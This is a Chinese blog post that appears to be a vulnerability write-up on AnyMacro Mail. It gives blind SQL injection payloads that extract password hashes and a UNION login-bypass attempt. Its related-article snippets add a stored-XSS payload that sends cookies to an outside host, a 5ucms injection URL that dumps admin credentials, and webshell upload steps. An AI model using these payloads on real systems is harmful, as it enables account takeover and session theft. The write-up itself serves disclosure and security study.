AnyMacro邮件系统SQL注入漏洞和XSS漏洞

最新推荐文章于 2024-08-04 22:47:29 发布
最新推荐文章于 2024-08-04 22:47:29 发布
阅读量3.8k 收藏
点赞数
分类专栏: WEB安全 文章标签: AnyMacro Sql注入 xss 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kingjxust/article/details/8528500
版权
本文详细介绍了AnyMacro邮件系统存在的SQL注入和XSS漏洞。通过SQL注入,攻击者可获取用户加密后的密码,但由于加密算法未知,无法破解。系统采用两重验证,使得单纯SQL注入无法绕过。同时,文章揭示了系统的XSS漏洞,允许通过特定手段盗取用户cookie,威胁用户会话安全。
摘要由CSDN通过智能技术生成
AnyMacro邮件系统在早期版本的用户登录处存在SQL注入漏洞,通过漏洞可爆出用户加密后的密码:
在用户名处输入 ' 号后 将提示错误:
Query DB [select crypt, status from user where id = '' @mail.doamin.cn'] err:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@mail.domain.cn'' at line 1

通过错误提示语句可知系统验证方式是先从用户表(user)中查询出用户的加密后密码(crypt)和用户的状态(status),然后通过比较加密后的用户输入的密码和数据库中查询出的加密后的密码来检测用户是否通过验证,所以无法通过构造万能密码来绕过验证,但是可以通过漏洞来爆出用户加密后的密码:
通过Live Http Headers 插件构造Post的数据,然后根据系统提示是用户不存在还是密码错误可猜解出用户加密后的密码(不知道加密后的密码的加密算法,所以无法破解,如果有谁知道,还请告知)
猜解加密后密码长度
' and (select crypt from user where id='admin@mail.domain.cn')>11  and '1'='1

猜解密码
' and (select ascii(mid(crypt,12,1)) from user where id='admin@mail.domain.cn')>96 and '1'='1

其实如果系统只是单纯的靠上面的第一重验证的话,还是可以绕过的,但是需要知道一个已知密码的账号(可以自己注册一个账号),然后通过SQL注入漏洞猜解出其加密的密码,再通过union来替换:
'+and+1=2+union+select+'12vfid3thEEak',status+from+user+where+id='admin@mail.domain.cn 
 通过Live Http Headers 构造上面的语句,就可以绕过第一重验证了,其中登录用户名处填任意账号,密码处填你自己知道账号的密码,语句的select 后面的字符串是你知道密码的加密后的字符串,这样就可以绕过第一重验证,但是很遗憾的是系统还采用了第二重验证,因为构造这条语句提交后会报另一个错误,大致的意思就是union的前后语句字段数不一致。所以无法靠构造语句来绕过验证。

手工猜解密码的速度太慢
最低0.47元/天 解锁文章
清风灬朗月
关注
专栏目录
AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业
fengling132的专栏
06-19 1万+
漏洞概要关注数(36) 关注此漏洞 缺陷编号: WooYun-2012-06672 漏洞标题: AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业 相关厂商: AnyMacro Mail 漏洞作者: 松子 提交时间: 2012-05-04 公开时间: 2012-06-18 漏洞类型: 非授权访问/权限绕过 危害等级
anymacro mail 严重漏洞
cnbird's blog
06-19 2997
设置邮件系统管理密码 密  码: 重输密码: class=bgcolor1> Copyright © 2002 Beijing Anymacro Investment Ltd. All Rights Reserved. 北京安宁投资有限公司 版权所有
Pageadmin-漏洞复现(上传⽂件漏洞
最新发布
Jz031212的博客
08-04 358
8.使用中国蚁剑将asp路径以及密码输入进去,测试连接,连接成功证明文件上传漏洞成功。5.点击功能菜单----上传文件 上传我们刚刚压缩好的zip文件。7.在地址栏中访问解压出来的asp文件,未报错证明木马注入成功。1.搭建环境启动登录管理员账户,在网址后加/admin。管理---生成 生成一个密码为pass的asp木马。6.上传后点击zip后的解压,将压缩包内的文件解压出来。4.将asp木马压缩成zip格式以便一会上传。2.进入后点击工具---
任意文件读取漏洞
qq_45540735的博客
08-22 1204
所谓文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。从整个攻击过程来看,它常常作为资产信息搜集的一种强力的补充手段,服务器的各种配置文件、文件形式存储的密钥、服务器信息(包括正在执行的进程信息)、历史命令、网络信息、应用源码及二进制程序都在这个漏洞触发点被攻击者窥探。 文件读取漏洞常常意味着被攻击者的服务器即将被攻击者彻底控制。当然,如果服务器严格按照标准的安全规范进行部署,即使应用中存在可利用的文件读取漏洞,攻击者也很难拿到有价值的信息。文件读取漏洞在每种可部署Web应用的程
Coremail邮件系统存储型XSS两个
weixin_34008933的博客
10-21 387
(1):Coremail邮件系统存储型XSS之一 给受害者发送主题如下的邮件: <svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'> 当受害者试图打开邮件时,cookie将会被窃取: (2):Coremail邮件系统存储型XSS之二 将特制的swf文件作为附件...
文件包含漏洞(新手友好篇)
YH,生活越来越好
04-25 241
文件包含漏洞(File Inclusion Vulnerability)是指服务端使用变量来包含文件,并通过动态调用 URL 来使用这些变量。如果没有对包含的文件进行有效的过滤,那么攻击者可以利用此漏洞来调用执行恶意文件或代码,从而导致文件包含漏洞的发生。
天空教室重大漏洞
fengling132的专栏
05-02 1324
漏洞概要关注数(3) 关注此漏洞 缺陷编号: WooYun-2012-06264 漏洞标题: 天空教室重大漏洞 相关厂商: 南京易学信息技术有限公司 漏洞作者: LinuxPad 提交时间: 2012-04-22 公开时间: 2012-04-22 漏洞类型: 设计缺陷/逻辑错误 危害等级: 高 自评Rank: 11 漏洞状态:
PHPCMS注册邮箱处SQL注入的修复分析
qq_63217130的博客
01-23 440
再看到他使用call_user_func()方法 对应调用的是 $controlle类r的public_checkemail_ajax方法。因此即使出现了 % 也是不行的(之前的sql注入就是利用url编码 绕过addslasher,如果email里面有%27则会报错 )此外因为最新版本在sql执⾏之前进⾏预编译了 也就是说如果解密后发现有引号之类的仍会加上反斜杠。parm构造类里面调用了addslasher即 对' ''加上反斜杠。然后看看这个类的构造函数 这里主要看看parm类的构造函数。
Filebrowse
06-18
Zip压缩及解压缩-83k 版权所有,未经允许不得...Email:cf@anymacro.com qq:394051476 个人主页:http://hi.baidu.com/feng131719 学历:烟大09届本科毕业生 职位:技术助理 人生格言:我会很棒 喜好:编程,侦探类电视剧
用SSL对邮件加密的支持 Postfix+SSL配置
05-18 2495
在postfix启用配置SSL,启用加密传输,如下是配置过程,一~三是使用openssl签发证书的过程,如果自行购买了证书,即可略过 一. 运行CA.pl命令来生成根证书。 cd /usr/share/ssl/misc ./CA -newca CA certificate filename (or enter to create) 直接回车,确认。 Making CA certific...
高频率的运维工程师面试题
Friendsofthewind的博客
03-25 526
20.某公司申请到一个c类ip地址,但要连接6个子公司,最大的一个子公司有26台计算机,每个子公司在一个网段中,则子网掩码应设为(B) A.255.255.255.0 B.255.255.255.128 C.255.255.255.192 C.255.255.255.224 24.IP地址中,B类地址的范围(C) A.63到127 B.64到128 C.128到191 D.127到192 26.在TCP/IP网络中,为各种公共服务保留的端口号范围是(D) A.1~255 B.1~1023
巡风探索
慢慢来的博客
08-06 5680
模块内容包括: ├─nascan │  │  NAScan.py # 网络资产信息抓取引擎 │  │ │  ├─lib │  │      cidr.py  │  │      common.py 其他方法 │  │      icmp.py  # ICMP发送类 │  │      log.py  # 日志输出 │  │      mongo.py  # 数据库连接 │  │      sca...
5ucms 最新版 sql 注入漏洞
fengling132的专栏
07-02 707
漏洞EXP↓  /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin 放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。
黑客精神是什么?小黑QQ1440580来告诉你们:
小黑中国
06-12 3327
“黑客;是帮助程序源和开发创作者们发现错误和可利用的逻辑性环节然后告诉程序源和开发者来改正促进网络发展,如今社会网络的原地踏步大多人而不是黑客利用漏洞来获取财物,这些利用漏洞的人只能称之为黑人,而不是黑客,黑客是在所需要的时候给予安全所带来风险提供救援的这才叫黑客。希望好的黑客们积极体会下这种使命感吧。================================================
SQL注入处存在的XSS漏洞
AaronLuo
10-17 673
SQL注入XSS都是web安全中的危险漏洞 简单来说一下XSS与CSRF最大的区别,这两个的最大的不同点在于XSS是客户端信任服务端,当服务端未过滤恶意代码发送给客户端,客户端浏览器就直接执行;CSRF是服务端信任客户端,当攻击者构造好url之后,受害者发送请求给服务器,通过服务器的验证(cookie,token之类的),则直接以受害者的权限执行相关操作,完成服务。 SQL注入中的XSS 环境 ...
sql 注入漏洞
Venscor技术养成之路
04-21 933
sql注入相关知识
[工具使用]黑暗引擎FOFA
热门推荐
网络安全知识分享
08-29 3万+
黑暗引擎FOFAFOFA(点我进入)逻辑运算符搜索子域名domain搜索指定内容的host全部域名bodycert搜索选定应用的网站搜索指定开放端口的IP搜索指定协议的IP搜索IP或者网段的信息搜索指定CSS/JS网站常用的一些内容其他 FOFA(点我进入) 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、
fckeditor <= 2.6.4 任意文件上传漏洞
weixin_30640291的博客
01-06 1019
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80)...
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
god_Zeo的安全博客
06-17 1万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
esapl入门及预防xsssql注入漏洞
qq_42723240的博客
07-30 1289
1.esapl解決过滤特殊字符,以及sql盲注问题(现阶段已知,不足之处请多指教) 针对web+spring+hibernate 老项目: 有maven仓库的可以参考这个:https://blog.csdn.net/CHS007chs/article/details/86645450 配置文件:(放在工程目录下,放在本地虽然可以运行,但不可以部署项目,识别不到说明位置不对,重新放配置文件位置) E...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值